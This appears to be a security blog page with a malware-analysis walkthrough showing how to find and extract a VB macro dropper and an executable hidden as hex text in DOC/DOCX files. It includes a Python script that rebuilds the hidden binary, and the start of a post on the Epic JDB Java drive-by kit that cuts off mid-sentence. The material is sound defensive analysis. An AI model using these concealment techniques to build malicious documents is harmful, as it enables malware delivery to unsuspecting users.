<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3Ipce5TKxEKSHCiuipOrPPwGin2aEBYtt_m3bAnNNRF4vJSrhwaZY3eCqLzurij21_jCH2ZcWu2-OnedqjPIfw19gcRWdJW_d2XkoTDLg8dgcdWB2ImBk16H_lv6ufqdQ7dXG2HbMmPut/s1600/OfficeMalScanner_scan-vb.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3Ipce5TKxEKSHCiuipOrPPwGin2aEBYtt_m3bAnNNRF4vJSrhwaZY3eCqLzurij21_jCH2ZcWu2-OnedqjPIfw19gcRWdJW_d2XkoTDLg8dgcdWB2ImBk16H_lv6ufqdQ7dXG2HbMmPut/s1600/OfficeMalScanner_scan-vb.PNG" height="89" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>OfficeMalScanner '<span style="color: #3d85c6;">scan</span>' option output</i></span></div>
<br />
No suspicious content has been found, but note the comment at the bottom of the output - the tool is recommending to analyse the file using '<span style="color: #3d85c6;">info</span>' option key.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHgFIqfvBiUVTjM25FXu4JWWJBUI6IBha2MZ5raL4o__QBNS0YqBKgwW43IVJu1VlmCStRe7PtrqddOZAbH95q7MIZwfSTzUQMWjC-SqUaIfpfAyygUfounqmP11kx9cZsUv2Ui6oaoNJG/s1600/OfficeMalScanner_info-vb.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHgFIqfvBiUVTjM25FXu4JWWJBUI6IBha2MZ5raL4o__QBNS0YqBKgwW43IVJu1VlmCStRe7PtrqddOZAbH95q7MIZwfSTzUQMWjC-SqUaIfpfAyygUfounqmP11kx9cZsUv2Ui6oaoNJG/s1600/OfficeMalScanner_info-vb.PNG" height="89" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>OfficeMalScanner '<span style="color: #3d85c6;">info</span>' option output</i></span></div>
<br />
Now the tool detected an embedded VB script and dumped it into a folder. Quick glance at the script shows that it will download and execute a file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEia-GudC3CzlPMKrGycoIwWT2SZ-TOfz0UJxqtU82GFgkK7OIZljgHzG0p4W0jpWLMc4S_IhhmOT9bj9MIFNM0ODQUH2aK5WkzLVowAXcl6P7h-enq8GaubTZhq904DdDprUfjoF2jOW7e6/s1600/VB_script_part.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEia-GudC3CzlPMKrGycoIwWT2SZ-TOfz0UJxqtU82GFgkK7OIZljgHzG0p4W0jpWLMc4S_IhhmOT9bj9MIFNM0ODQUH2aK5WkzLVowAXcl6P7h-enq8GaubTZhq904DdDprUfjoF2jOW7e6/s1600/VB_script_part.PNG" height="17" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>part of extracted VB script</i></span></div>
<br />
'<span style="color: #3d85c6;">OfficeMalScanner</span>' tool can detect and extract embedded EXE files. The screenshot below shows an example of the tool output when it detects an EXE file embedded into a DOC file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdTo17Ya7H0PTiu-aEpErN6000i9iNur0Omjs9QJbN-_Bs9RmLgSqBQuWSfvQ1-vOLmLPz4OsgGrzaQT1_-I-tjjlCYhgglv7_dZWyfXos9ozjjIPO-y0w8vkpNhLcSrUqU32ZJvW2CQdm/s1600/DOC+EXE.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdTo17Ya7H0PTiu-aEpErN6000i9iNur0Omjs9QJbN-_Bs9RmLgSqBQuWSfvQ1-vOLmLPz4OsgGrzaQT1_-I-tjjlCYhgglv7_dZWyfXos9ozjjIPO-y0w8vkpNhLcSrUqU32ZJvW2CQdm/s1600/DOC+EXE.PNG" height="165" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>OfficeMalScanner output - detected and dumped embedded EXE</i></span></div>
<br />
'<span style="color: #3d85c6;">OfficeMalScanner</span>' tool can also handle <a href="http://en.wikipedia.org/wiki/Office_Open_XML" rel="nofollow" target="_blank">Office Open XML</a> files. Below is an example of the tool output when used with '<span style="color: #3d85c6;">inflate</span>' option.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjErSRbjiAahs3HTugv_vsZxVGXP6TTYjPYjkSbgEjNjRIFLbkmOOY-wC5TKWPHgCnO_LbyhDSj3EDMCriF7MwXlQBhLNdXiXNnmo7GCCO47_qF5GNUX-fLfJ23JorogFx-jXLeVsWBP26B/s1600/OfficeMalScanner_docx.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjErSRbjiAahs3HTugv_vsZxVGXP6TTYjPYjkSbgEjNjRIFLbkmOOY-wC5TKWPHgCnO_LbyhDSj3EDMCriF7MwXlQBhLNdXiXNnmo7GCCO47_qF5GNUX-fLfJ23JorogFx-jXLeVsWBP26B/s1600/OfficeMalScanner_docx.PNG" height="163" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>OfficeMalScanner '<span style="color: #3d85c6;">inflate</span>' option output</i></span></div>
<u><br /></u>
<u>NOTE:</u> Simply changing an Office Open XML file extension to '<span style="color: #3d85c6;">zip</span>' and opening the file with an archiving tool of your choice will allow you to extract its file structure as well.<br />
<br />
The decompressed files will be stored in '<span style="color: #3d85c6;">DecompressedMsOfficeDocument</span>' folder in user's '<span style="color: #3d85c6;">%TEMP%</span>' location. In this particular example, the tool highlighted one file - '<span style="color: #3d85c6;">word/vbaProject.bin</span>' to be suspicious and suggested to run the tool against it using '<span style="color: #3d85c6;">scan</span>' or '<span style="color: #3d85c6;">info</span>' options.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4HHrnioNs1PglNkaW7HFpxrIGuD4I28IV-gVmczqOCP3BWDy8ryoiBJn6lyRgej7AzKBwHHTvuxcpGVWjWt1WIPWLi3MtxmxPcxbG0yx0uIb7g0U-IrthQ-qtKrABs4Elj_3SHPDXFn2W/s1600/OfficeMalScanner_vb_embedded.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4HHrnioNs1PglNkaW7HFpxrIGuD4I28IV-gVmczqOCP3BWDy8ryoiBJn6lyRgej7AzKBwHHTvuxcpGVWjWt1WIPWLi3MtxmxPcxbG0yx0uIb7g0U-IrthQ-qtKrABs4Elj_3SHPDXFn2W/s1600/OfficeMalScanner_vb_embedded.PNG" height="113" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>OfficeMalScanner '<span style="color: #3d85c6;">info</span>' option output for embedded into DOCX file VB script</i></span></div>
<br />
The tool has found and extracted an embedded VB script. This script doesn't seem to be reaching out to any external sources, like, we've seen in a previous example. Instead, it extracts '<span style="color: #3d85c6;">text</span>'(<w:t>) from each '<span style="color: #3d85c6;">paragraph</span>'(<w:p>) in the document, saves extracted data to a file and executes it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSNnGHgDBS3dIWDZVf9RmxPRw5MGCghzFvMBJTyTdXTPqHkEFx26J13Fd6pDbnlnAEOJFQDRTfxZWJrz-tGG57QYASpb-uVUduQtUL2cb38uh05JIodxTDuxlgyqx8r_Zbl8YYI90FYBib/s1600/docx_vbscript.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSNnGHgDBS3dIWDZVf9RmxPRw5MGCghzFvMBJTyTdXTPqHkEFx26J13Fd6pDbnlnAEOJFQDRTfxZWJrz-tGG57QYASpb-uVUduQtUL2cb38uh05JIodxTDuxlgyqx8r_Zbl8YYI90FYBib/s1600/docx_vbscript.PNG" height="207" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>Extract from malicious VB script (no execution part included)</i></span></div>
<br />
At this point we know there is an executable file hidden in this document, but since it's represented as text, '<span style="color: #3d85c6;">OfficeMalScanner</span>' tool will not detect it. The screenshot below shows an example of the paragraphs and the text stored in them that reassemble the executable file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ4HImx16iozzeP1wmUq1IsyxeLuR-hUXVkNMungjKFxRVtsi0krPMr1NW2mymjykSIeQMe8_AsGx5sz6zQN_uodWDTzmzQlqvlDcDOnBrOT1D9wwLGWLUadJWjOPk6InxO6fBIH7d3LB_/s1600/docx_view_in_XML_explorer.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ4HImx16iozzeP1wmUq1IsyxeLuR-hUXVkNMungjKFxRVtsi0krPMr1NW2mymjykSIeQMe8_AsGx5sz6zQN_uodWDTzmzQlqvlDcDOnBrOT1D9wwLGWLUadJWjOPk6InxO6fBIH7d3LB_/s1600/docx_view_in_XML_explorer.PNG" height="136" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>'<span style="color: #3d85c6;">word/document.xml</span>' file view in '<span style="color: #3d85c6;">XML Explorer</span>' tool</i></span></div>
<br />
The following simple Python script can help to reconstruct the file from the text strings.<br />
<br />
import zipfile, re<br />
<br />
def saveFile(filename, content):<br />
fo = open(filename, "wb")<br />
fo.write(content)<br />
fo.close()<br />
return<br />
<br />
def main(inputFile, outputFile):<br />
docxFile = zipfile.ZipFile(inputFile)<br />
textContent = docxFile.read('word/document.xml')<br />
textContentInOneString = re.sub('<(.|\n)*?>','',textContent)<br />
bytesOnlyRegexGroup = re.search(re.escape("&amp;H") + ".*[a-zA-Z0-9]{2}", textContentInOneString)<br />
bytesOnly = bytesOnlyRegexGroup.group(0).replace("&amp;H","").decode('hex')<br />
saveFile(outputFile, bytesOnly)<br />
<br />
readFrom = "C:\\infected\\27.05.2014\\Law Society message.docx"<br />
saveTo = "C:\\infected\\27.05.2014\\extracted.bin"<br />
<br />
main(readFrom, saveTo)<br />
<br />
Checking the extracted file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLMjySKx9XbWdoAEOyL6W9c_q2-t1JIVhGYSldvsNrE0bhnJKHGsHKtHnmrK5-X-LbSxo1jJqa2oF0mwLH3UJhRcl7-Te0EA7mku9QgkilQRlCohAk1QXrziew-wMkm8clZqoyJULlPjxs/s1600/extracted_bin.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLMjySKx9XbWdoAEOyL6W9c_q2-t1JIVhGYSldvsNrE0bhnJKHGsHKtHnmrK5-X-LbSxo1jJqa2oF0mwLH3UJhRcl7-Te0EA7mku9QgkilQRlCohAk1QXrziew-wMkm8clZqoyJULlPjxs/s1600/extracted_bin.PNG" height="99" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>extracted file header</i></span></div>
<br />
Target confirmed. Further info on the file is available on <a href="https://www.virustotal.com/en/file/706f0063050073ed5f0e004d6f44523b79419f7db3be18feffc73386e030f54c/analysis/" rel="nofollow" target="_blank">VT</a>.<br />
<br />
Other files contained in Office Open XML file structure that might be useful during an analysis<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU3Wj3ECeu7vVkCeG-Zs83NFBXk2wbOaT-cggpxh9-zoZ3zjhX7NFeMZfNdGW83l3zs8HErHSIcxDnYv-uTPcmWE-9TZGYXOZGMQu0xp2obGCdJPrTn97qckMuuuAyypIV6mdi5xfKRZKH/s1600/other_files1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU3Wj3ECeu7vVkCeG-Zs83NFBXk2wbOaT-cggpxh9-zoZ3zjhX7NFeMZfNdGW83l3zs8HErHSIcxDnYv-uTPcmWE-9TZGYXOZGMQu0xp2obGCdJPrTn97qckMuuuAyypIV6mdi5xfKRZKH/s1600/other_files1.PNG" height="75" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>'<span style="color: #3d85c6;">\[Content_Types].xml</span>' file view in XML Explorer tool</i></span></div>
<br />
'<span style="color: #3d85c6;">[Content_Types].xml</span>' file holds the list of all the content types used in the document.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnt3LF37zRwLV1yzBOCrKzNE9VJ18duvjkx4JJ0f0HAIhOqXSrXNBEgAuEoKZSNJsrn0v8NxJdTXdtegiygMpQWr7cQ9-Wcr2UYsauTt_zhVpw_FHzDLE2OqJ6HyRu0ivXDT18P4Cm2GvN/s1600/other_files2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnt3LF37zRwLV1yzBOCrKzNE9VJ18duvjkx4JJ0f0HAIhOqXSrXNBEgAuEoKZSNJsrn0v8NxJdTXdtegiygMpQWr7cQ9-Wcr2UYsauTt_zhVpw_FHzDLE2OqJ6HyRu0ivXDT18P4Cm2GvN/s1600/other_files2.PNG" height="59" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>'<span style="color: #3d85c6;">\word\_rels\document.xml.rels</span>' file view in XML Explorer tool</i></span></div>
<br />
'<span style="color: #3d85c6;">\word\_rels\document.xml.rels</span>' file contains details about any embedded elements. In the example above it shows 4 embedded OLE objects. These are not necessarily malicious objects. Anything embedded into a DOCX file is stored as an OLE object. These objects can be found in '<span style="color: #3d85c6;">\word\embeddings</span>' folder and can be analysed with '<span style="color: #3d85c6;">OfficeMalScanner</span>' tool. If the tool finds nothing suspicious '<span style="color: #3d85c6;">SSViewer(Structure Storage Viewer)</span>' utility can be used to extract the content of an OLE object for further analysis. The screenshot below shows an OLE file opened in SSViewer tool. OLE file components can be extracted and saved as a data stream file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFwCM6c7hM4Xr09W10dLK3Pp_GNDvPCy09qTZMRma0t0WBzepnu7rweiEe42rmYaQc8St8H1El_AqX8uR6_PvgCCZJWeQurkvvZkG0iG5_r1TgKVmc5DoDk5JCjRjye97OhQUxwFx_sZtv/s1600/ssviewer_save_stream.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFwCM6c7hM4Xr09W10dLK3Pp_GNDvPCy09qTZMRma0t0WBzepnu7rweiEe42rmYaQc8St8H1El_AqX8uR6_PvgCCZJWeQurkvvZkG0iG5_r1TgKVmc5DoDk5JCjRjye97OhQUxwFx_sZtv/s1600/ssviewer_save_stream.png" height="127" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>extracting content of an OLE file using SSViewer tool</i></span></div>
<br />
The content will be saved into a file with '<span style="color: #3d85c6;">.stream</span>' extension. Further file <a href="http://www.garykessler.net/library/file_sigs.html" rel="nofollow" target="_blank">header</a> analysis is required to determine the file type. In this particular example, the extracted content turned out to be <a href="http://en.wikipedia.org/wiki/Windows_Metafile" rel="nofollow" target="_blank">WMF</a>(Windows Metafile) file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyj12Fb51MinqUVQlcHHAijRjYv7Q21c02ZEYmtbSnTSLvHvT7abuNxmdB3Z_HPMND92AJe8fPMjz0bPeSopVGCORqU7yOGnmmgIkGeGX7fQaV0LqcvVrcFsTTK519NeZhQsns-_XKCoQs/s1600/embedded_wmf.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyj12Fb51MinqUVQlcHHAijRjYv7Q21c02ZEYmtbSnTSLvHvT7abuNxmdB3Z_HPMND92AJe8fPMjz0bPeSopVGCORqU7yOGnmmgIkGeGX7fQaV0LqcvVrcFsTTK519NeZhQsns-_XKCoQs/s1600/embedded_wmf.PNG" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>example of a file extracted from an OLE object</i></span></div>
<br />
Saving a stream to a file will not always reconstruct the original file. The snapshot below shows a stream extracted from an OLE object that was embedded into DOCX file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl_GQuaVWHu8IuwDat1t9aKpd_ERrN8045OA4D0o_v3Kzt71hfGbuj4_fR-V-Q56wCchb9cmyn9ZPbZPQDGrRd-js3ba0TJUW6dHi-DUxRN35k9AAMT_75dTciD8rZA5nWCCUDezc-PAAu/s1600/embedded_exe1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl_GQuaVWHu8IuwDat1t9aKpd_ERrN8045OA4D0o_v3Kzt71hfGbuj4_fR-V-Q56wCchb9cmyn9ZPbZPQDGrRd-js3ba0TJUW6dHi-DUxRN35k9AAMT_75dTciD8rZA5nWCCUDezc-PAAu/s1600/embedded_exe1.PNG" height="16" width="320" /></a></div>
<div style="text-align: center;">
<div style="text-align: center;">
<span style="font-size: x-small;"><i>example of a stream file extracted from an OLE object</i></span></div>
<br /></div>
Apart from showing the location where the embedded file is stored on the originating machine, note the '<span style="color: #3d85c6;">MZ</span>' and '<span style="color: #3d85c6;">This program must</span>' strings. It's safe to assume that the embedded file is an EXE file, but in the current format it has some extra bits. To be able to restore the original file from the saved stream, we need to remove the data preceding the EXE header and the extra data at the end. Where the preceding data is not a problem and simply removing everything up to '<span style="color: #3d85c6;">MZ</span>' will give us the beginning of the original file, dealing with the extra bit at the end might be tricky. One of the ways to deal with it is to use '<span style="color: #3d85c6;">PEStudio</span>' tool.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxiK3yG33uoRsYA9WoY2NRAmzMHiZV6I47Rax9w-wcPI2h968UTpNiEnkr2Eht6NJ1OrACT7WGAI4LHwtfi2iZvDoyaEPt4KOIakfGNpoHvMdxl7rsl15QZVesnSPLu092P-s72SyQiAOc/s1600/pestudio_overlay_example.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxiK3yG33uoRsYA9WoY2NRAmzMHiZV6I47Rax9w-wcPI2h968UTpNiEnkr2Eht6NJ1OrACT7WGAI4LHwtfi2iZvDoyaEPt4KOIakfGNpoHvMdxl7rsl15QZVesnSPLu092P-s72SyQiAOc/s1600/pestudio_overlay_example.PNG" height="169" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>'<span style="color: #3d85c6;">overlay</span>' detected in PEStudio</i></span></div>
<br />
PEStudio has detected some extra bytes(overlay) starting at offset 0x00322E00. Now we need to find the offset address at the end of the stream file and remove the overlay.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1XIJzwOQoVRHpIZf-RJnVPjosY9cTLdSFbhAOLM6WR3kRCmcXE4h05BzFQ75YA_ctJOtnoLnCp5xhyTWVs24WEr8bXD-Brqmf50s2J0ZfWYX1ImpaOtE2PLqg1WHEjsaVpWCzedpH7NDI/s1600/extra_data_at_the_end.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1XIJzwOQoVRHpIZf-RJnVPjosY9cTLdSFbhAOLM6WR3kRCmcXE4h05BzFQ75YA_ctJOtnoLnCp5xhyTWVs24WEr8bXD-Brqmf50s2J0ZfWYX1ImpaOtE2PLqg1WHEjsaVpWCzedpH7NDI/s1600/extra_data_at_the_end.PNG" height="252" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>the end of the extracted stream containing the overlay</i></span></div>
<br />
Once the extra data is removed, the original EXE file is fully restored and can be analysed further. If for whatever reason we want a copy of the overlay data PEStudio can be used to save it into a file.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoHKcGoM5_he7Gd7uKo7Hjm379PoVCLJMYrLN2nwEbjJPZzfI-HhEvrtKvygVodR0Z3icX1s6Yca6XaJz8cpAsWoBfEZf7iHrWonAW6TrLh70_QHyndYmmvU_liqEk4OwIIpkXG5135Sy4/s1600/pestudio_overlay_dump.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoHKcGoM5_he7Gd7uKo7Hjm379PoVCLJMYrLN2nwEbjJPZzfI-HhEvrtKvygVodR0Z3icX1s6Yca6XaJz8cpAsWoBfEZf7iHrWonAW6TrLh70_QHyndYmmvU_liqEk4OwIIpkXG5135Sy4/s1600/pestudio_overlay_dump.PNG" height="99" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>saving '<span style="color: #3d85c6;">overlay</span>' to a file </i></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU6UbsL5wBCWFuZHRqTYgy1v_ANQrApOQ0Rbu62_pN_H6H9AoZUhiVUqxRGgWI2KBgqeGDG_sofU6Sf2yRTcmJaXDHY0EQMZM8k_9q799KC6WM2hCyPSufBU0SmnQGK9OTKRugk0dnywh3/s1600/extracted_overlay.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU6UbsL5wBCWFuZHRqTYgy1v_ANQrApOQ0Rbu62_pN_H6H9AoZUhiVUqxRGgWI2KBgqeGDG_sofU6Sf2yRTcmJaXDHY0EQMZM8k_9q799KC6WM2hCyPSufBU0SmnQGK9OTKRugk0dnywh3/s1600/extracted_overlay.PNG" height="147" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>extracted '<span style="color: #3d85c6;">overlay</span>' file </i></span></div>
<br />
<br />Hope these tips are helpful.<br />
<br />
<br />Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-250109472373647719.post-82373930290562013742014-01-19T17:44:00.001+00:002014-01-20T12:30:47.312+00:00EpicKit aka Epic JDB: "Do you want fries with that?"NOTE: The information is based on a sample captured on 2014-01-14.<br />
<br />
Thanks to <a href="https://twitter.com/cryptoron" rel="nofollow" target="_blank">@cryptoron</a> for <a href="https://twitter.com/cryptoron/status/423081187649671168" rel="nofollow" target="_blank">raising</a> the awareness and <a href="https://twitter.com/MaartenVDantzig" rel="nofollow" target="_blank">@MaartenVDantzig</a> for sharing some intel.<br />
<br />
<b><span style="color: #3d85c6;">"You know, for kids!"</span></b><br />
<br />
Here's a quick description of this kit.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWT-P9UH-1ymSeFKtTdjyIJZi-d4I8Bbxz34H4EVAC6z6pnVKDtRcxLOkP0zPNHEipk1jHOiZSqTltWVa2WRdrZQaO2uPygG_6O6QP6iuXqsBHI27H_yYYmSLn-MoNsmnkPoY7q1kfnn47/s1600/2014-01-14-EpicJDB-sales-thread.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWT-P9UH-1ymSeFKtTdjyIJZi-d4I8Bbxz34H4EVAC6z6pnVKDtRcxLOkP0zPNHEipk1jHOiZSqTltWVa2WRdrZQaO2uPygG_6O6QP6iuXqsBHI27H_yYYmSLn-MoNsmnkPoY7q1kfnn47/s1600/2014-01-14-EpicJDB-sales-thread.png" height="320" width="301" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">part of Epic Java advertisement from Hackforums</span></i></div>
<br />
In '<span style="color: #3d85c6;">Terms & Conditions</span>' part it's being referenced as '<span style="color: #3d85c6;">Educational Java Drive-By</span>'. I'm not quite sure if it's a type of an account under their service or they sell this product under '<span style="color: #3d85c6;">educational purpose only</span>' banner.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRCGpXm40aQf_Cn-mXZ1ZC7xcp8cd9yQpNKlaFph8JcLfh90zGmE9wMrSDA_pTjF5wnFO2Z3MwpoMG8P6Cg0y1v1T-jlKHO8mjkKk-YnrOKFWXzd1fJwCoexc8HXBmrjOS4oRW4zFEnpbk/s1600/2014-01-14-EpicJDB-terms.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRCGpXm40aQf_Cn-mXZ1ZC7xcp8cd9yQpNKlaFph8JcLfh90zGmE9wMrSDA_pTjF5wnFO2Z3MwpoMG8P6Cg0y1v1T-jlKHO8mjkKk-YnrOKFWXzd1fJwCoexc8HXBmrjOS4oRW4zFEnpbk/s1600/2014-01-14-EpicJDB-terms.png" height="132" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">part of '<span style="color: #3d85c6;">Term & Conditions</span>' for Epic Java</span></i></div>
<br />
The features advertised are just a little bit an overkill for being '<span style="color: #3d85c6;">educational purpose only</span>' though.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8Gk32o-kehtFqsUtp3Wtjw0mPab0y4LZ37YIEBHqejY3o9Fp77xTj3SvMYeJjlkOtDzhdNIrqQRZGaAAps8HZIdGVSHH8o3B3fkA5f4u_NlR8bSm9o8QZYvu-Opb7jlSIAKJsCQaNlruQ/s1600/2014-01-14-EpicJDB-features.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8Gk32o-kehtFqsUtp3Wtjw0mPab0y4LZ37YIEBHqejY3o9Fp77xTj3SvMYeJjlkOtDzhdNIrqQRZGaAAps8HZIdGVSHH8o3B3fkA5f4u_NlR8bSm9o8QZYvu-Opb7jlSIAKJsCQaNlruQ/s1600/2014-01-14-EpicJDB-features.png" height="253" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Epic Java features as per advert on Hackforums</span></i></div>
<br />
<b><span style="color: #3d85c6;">"I'm not confident on which end that came out of."</span></b><br />
<br />
In terms of implementation, this kit doesn't have any exploit code. It used certificate signed JAR files to bypass Java Security Warning Window(works only on Java 1.7.21 and earlier) and to escalate applet's runtime privileges. The Java code is obfuscated with Zelix KlassMaster using Name, Control Flow obfuscation and String Encryption techniques.<br />
<br />
Compromise attempt start with a landing on a website that serves pages injected with Epic JDB malicious <applet>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimofqB9m50ZrbQiIXNmgeBP6OfJEAHZavvq_QSPnzMnQ1X_X5t0l9DudC0IGsTPmdVJbKpWhPxRIhAtU87B_zcVywK4m6cruoyczFIFceliN1bYRhiea6CaJJfv6YBewpik6wSI432uACh/s1600/2014-01-14-EpicJDB-applet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimofqB9m50ZrbQiIXNmgeBP6OfJEAHZavvq_QSPnzMnQ1X_X5t0l9DudC0IGsTPmdVJbKpWhPxRIhAtU87B_zcVywK4m6cruoyczFIFceliN1bYRhiea6CaJJfv6YBewpik6wSI432uACh/s1600/2014-01-14-EpicJDB-applet.png" height="36" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">sample of injected <applet></span></i></div>
<br />
The following URL pattern was observed with this Epic JDB sample.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
